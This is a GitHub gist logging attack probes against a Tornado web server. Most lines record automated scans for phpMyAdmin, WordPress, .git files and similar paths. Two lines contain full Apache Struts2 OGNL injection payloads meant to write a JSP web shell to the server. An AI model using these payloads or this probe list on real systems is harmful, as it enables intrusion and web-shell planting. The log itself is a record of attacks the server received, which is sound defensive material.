Skip to content

Instantly share code, notes, and snippets.

@michardy
Created December 12, 2016 06:32
Show Gist options
  • Save michardy/022450fbc108ec594a0aa30304f1c817 to your computer and use it in GitHub Desktop.
Save michardy/022450fbc108ec594a0aa30304f1c817 to your computer and use it in GitHub Desktop.
SSP_Server_attacks
WARNING:tornado.access:404 GET /muieblackcat (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET //phpMyAdmin/scripts/setup.php (127.0.0.1) 0.39ms
WARNING:tornado.access:404 GET //phpmyadmin/scripts/setup.php (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET //pma/scripts/setup.php (127.0.0.1) 0.36ms
WARNING:tornado.access:404 GET //myadmin/scripts/setup.php (127.0.0.1) 0.44ms
WARNING:tornado.access:404 GET //MyAdmin/scripts/setup.php (127.0.0.1) 0.43ms
WARNING:tornado.access:404 GET /dynamic/collect-vsdoc.js (127.0.0.1) 0.37ms
WARNING:tornado.access:404 GET /static/js/send-vsdoc.js (127.0.0.1) 0.45ms
WARNING:tornado.access:404 GET /dynamic/collect.debug.js (127.0.0.1) 0.36ms
WARNING:tornado.access:404 GET /static/js/send.debug.js (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /phpmyadmin/scripts/setup.php (127.0.0.1) 0.37ms
WARNING:tornado.access:404 HEAD /check_proxy (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET /xmlrpc.php (127.0.0.1) 0.39ms
WARNING:tornado.access:404 GET /cgi/common.cgi (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET /stssys.htm (127.0.0.1) 0.40ms
WARNING:tornado.access:404 POST /command.php (127.0.0.1) 1.12ms
WARNING:tornado.access:404 GET /plugins/content/plugin_googlemap2_proxy.php?url= (127.0.0.1) 0.42ms
WARNING:tornado.access:404 GET /plugins/system/plugin_googlemap2_proxy.php?url= (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET /plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= (127.0.0.1) 0.42ms
WARNING:tornado.access:404 HEAD /phpmyadmin/index.php (127.0.0.1) 0.41ms
WARNING:tornado.access:404 HEAD /u.php (127.0.0.1) 0.39ms
WARNING:tornado.access:404 HEAD /tz.php (127.0.0.1) 0.31ms
WARNING:tornado.access:404 HEAD /info.php (127.0.0.1) 0.31ms
WARNING:tornado.access:404 HEAD /ceshi.php (127.0.0.1) 0.30ms
WARNING:tornado.access:404 HEAD /p.php (127.0.0.1) 0.28ms
WARNING:tornado.access:404 HEAD /phpinfo.php (127.0.0.1) 0.26ms
WARNING:tornado.access:404 HEAD /1.php (127.0.0.1) 0.55ms
WARNING:tornado.access:404 HEAD /php_info.php (127.0.0.1) 0.38ms
WARNING:tornado.access:404 HEAD /l.php (127.0.0.1) 0.49ms
WARNING:tornado.access:404 GET /axis2 (127.0.0.1) 0.42ms
WARNING:tornado.access:404 GET /axis2 (127.0.0.1) 0.41ms
WARNING:tornado.access:404 GET /axis2 (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /phpmyadmin/index.php (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /cgi/common.cgi (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /stssys.htm (127.0.0.1) 0.40ms
WARNING:tornado.access:404 POST /command.php (127.0.0.1) 0.56ms
WARNING:tornado.access:404 GET /muieblackcat (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET //pma/scripts/setup.php (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET //phpMyAdmin/scripts/setup.php (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET //phpmyadmin/scripts/setup.php (127.0.0.1) 0.39ms
WARNING:tornado.access:404 GET /axis2 (127.0.0.1) 0.37ms
WARNING:tornado.access:404 GET /robots.txt (127.0.0.1) 0.39ms
WARNING:tornado.access:404 GET /sitemap.xml (127.0.0.1) 0.39ms
WARNING:tornado.access:404 HEAD /check_proxy (127.0.0.1) 0.39ms
WARNING:tornado.access:404 GET /phpmyadmin (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET /loginAction.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=lndex.jsp&shellContent=x&encoding=UTF-8&pp=%2f&info1=oko&info2=kok (127.0.0.1) 0.50ms
WARNING:tornado.access:404 GET /index.do?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=lndex.jsp&shellContent=x&encoding=UTF-8&pp=%2f&info1=oko&info2=kok (127.0.0.1) 0.56ms
WARNING:tornado.access:404 GET /user/login (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /muieblackcat (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET //phpMyAdmin/scripts/setup.php (127.0.0.1) 0.41ms
WARNING:tornado.access:404 GET //phpmyadmin/scripts/setup.php (127.0.0.1) 0.41ms
WARNING:tornado.access:404 GET //mysqladmin/scripts/setup.php (127.0.0.1) 0.39ms
WARNING:tornado.access:404 GET /script (127.0.0.1) 0.39ms
WARNING:tornado.access:405 HEAD / (127.0.0.1) 0.42ms
WARNING:tornado.access:404 GET /clientaccesspolicy.xml (127.0.0.1) 0.44ms
WARNING:tornado.access:404 GET /favicon.ico (127.0.0.1) 0.37ms
WARNING:tornado.access:404 GET /favicon.ico (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET //wp-login.php (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /blog//wp-login.php (127.0.0.1) 0.39ms
WARNING:tornado.access:404 GET /wordpress//wp-login.php (127.0.0.1) 0.43ms
WARNING:tornado.access:404 GET /wp//wp-login.php (127.0.0.1) 0.42ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.42ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.35ms
WARNING:tornado.access:405 POST / (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET /nmaplowercheck1480883897 (127.0.0.1) 0.30ms
WARNING:tornado.access:404 GET /.git/HEAD (127.0.0.1) 0.30ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.31ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.36ms
WARNING:tornado.access:404 GET /robots.txt (127.0.0.1) 0.37ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.37ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.32ms
WARNING:tornado.access:405 RREU / (127.0.0.1) 0.32ms
WARNING:tornado.access:404 GET /HNAP1 (127.0.0.1) 0.48ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.42ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.31ms
WARNING:tornado.access:405 HEAD / (127.0.0.1) 0.39ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /favicon.ico (127.0.0.1) 0.38ms
WARNING:tornado.access:405 POST / (127.0.0.1) 0.42ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.31ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.41ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.38ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.40ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.42ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.41ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.42ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.29ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.30ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.44ms
WARNING:tornado.access:404 GET /.git/HEAD (127.0.0.1) 0.31ms
WARNING:tornado.access:404 GET /nmaplowercheck1480884190 (127.0.0.1) 0.29ms
WARNING:tornado.access:404 GET /robots.txt (127.0.0.1) 0.30ms
WARNING:tornado.access:405 POST / (127.0.0.1) 0.49ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.39ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.43ms
WARNING:tornado.access:405 SHCM / (127.0.0.1) 0.30ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.50ms
WARNING:tornado.access:404 GET /HNAP1 (127.0.0.1) 0.43ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.46ms
WARNING:tornado.access:405 HEAD / (127.0.0.1) 0.46ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.63ms
WARNING:tornado.access:404 GET /favicon.ico (127.0.0.1) 0.32ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.48ms
WARNING:tornado.access:405 POST / (127.0.0.1) 0.33ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.45ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.31ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.41ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.40ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /nmaplowercheck1480884292 (127.0.0.1) 0.42ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.35ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.30ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.32ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.27ms
WARNING:tornado.access:404 GET /.git/HEAD (127.0.0.1) 0.29ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.31ms
WARNING:tornado.access:404 GET /robots.txt (127.0.0.1) 0.28ms
WARNING:tornado.access:405 POST / (127.0.0.1) 0.59ms
WARNING:tornado.access:404 GET /HNAP1 (127.0.0.1) 0.42ms
WARNING:tornado.access:405 YRQZ / (127.0.0.1) 0.37ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.32ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.34ms
WARNING:tornado.access:404 GET /favicon.ico (127.0.0.1) 0.36ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.42ms
WARNING:tornado.access:405 HEAD / (127.0.0.1) 0.45ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.30ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.36ms
WARNING:tornado.access:405 POST / (127.0.0.1) 0.34ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.39ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.34ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.41ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.39ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.39ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.68ms
WARNING:tornado.access:404 GET /.git/HEAD (127.0.0.1) 0.39ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.29ms
WARNING:tornado.access:404 GET /robots.txt (127.0.0.1) 0.29ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.27ms
WARNING:tornado.access:405 POST / (127.0.0.1) 0.38ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.28ms
WARNING:tornado.access:404 GET /nmaplowercheck1480887654 (127.0.0.1) 0.28ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.35ms
WARNING:tornado.access:405 PROPFIND / (127.0.0.1) 0.33ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.29ms
WARNING:tornado.access:405 ZTIL / (127.0.0.1) 0.33ms
WARNING:tornado.access:404 GET /HNAP1 (127.0.0.1) 0.43ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /favicon.ico (127.0.0.1) 0.40ms
WARNING:tornado.access:405 HEAD / (127.0.0.1) 0.42ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.30ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.38ms
WARNING:tornado.access:405 POST / (127.0.0.1) 0.32ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.39ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.31ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.40ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.40ms
WARNING:tornado.access:405 OPTIONS / (127.0.0.1) 0.39ms
WARNING:tornado.access:404 GET /robots.txt (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET /sitemap.xml (127.0.0.1) 0.41ms
WARNING:tornado.access:404 GET //pma/scripts/setup.php (127.0.0.1) 0.78ms
WARNING:tornado.access:404 GET //myadmin/scripts/setup.php (127.0.0.1) 0.39ms
WARNING:tornado.access:404 HEAD /phpmyadmin/index.php (127.0.0.1) 0.38ms
WARNING:tornado.access:405 HEAD / (127.0.0.1) 0.41ms
WARNING:tornado.access:404 GET /clientaccesspolicy.xml (127.0.0.1) 0.46ms
WARNING:tornado.access:404 GET /xmlrpc.php (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /manager/html (127.0.0.1) 0.39ms
WARNING:tornado.access:404 HEAD /check_proxy (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET /xmlrpc.php (127.0.0.1) 0.41ms
WARNING:tornado.access:404 GET /axis-cgi/jpg/image.cgi (127.0.0.1) 0.40ms
WARNING:tornado.access:405 HEAD / (127.0.0.1) 0.71ms
WARNING:tornado.access:404 HEAD /wp-login.php (127.0.0.1) 0.39ms
WARNING:tornado.access:404 HEAD /wp-content/ (127.0.0.1) 0.40ms
WARNING:tornado.access:404 HEAD /magmi/ (127.0.0.1) 0.40ms
WARNING:tornado.access:404 HEAD /skin/adminhtml/ (127.0.0.1) 0.50ms
WARNING:tornado.access:404 HEAD /app/Mage.php (127.0.0.1) 0.53ms
WARNING:tornado.access:404 GET /echo.php?info=20161210103723 (127.0.0.1) 0.42ms
WARNING:tornado.access:405 HEAD / (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET /cgi/common.cgi (127.0.0.1) 0.40ms
WARNING:tornado.access:404 GET /stssys.htm (127.0.0.1) 0.71ms
WARNING:tornado.access:404 POST /command.php (127.0.0.1) 1.17ms
WARNING:tornado.access:405 HEAD / (127.0.0.1) 0.38ms
WARNING:tornado.access:404 GET /.git/config (127.0.0.1) 0.41ms
WARNING:tornado.access:404 GET /.git/config (127.0.0.1) 0.44ms
WARNING:tornado.access:404 GET /.git/config (127.0.0.1) 0.39ms
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment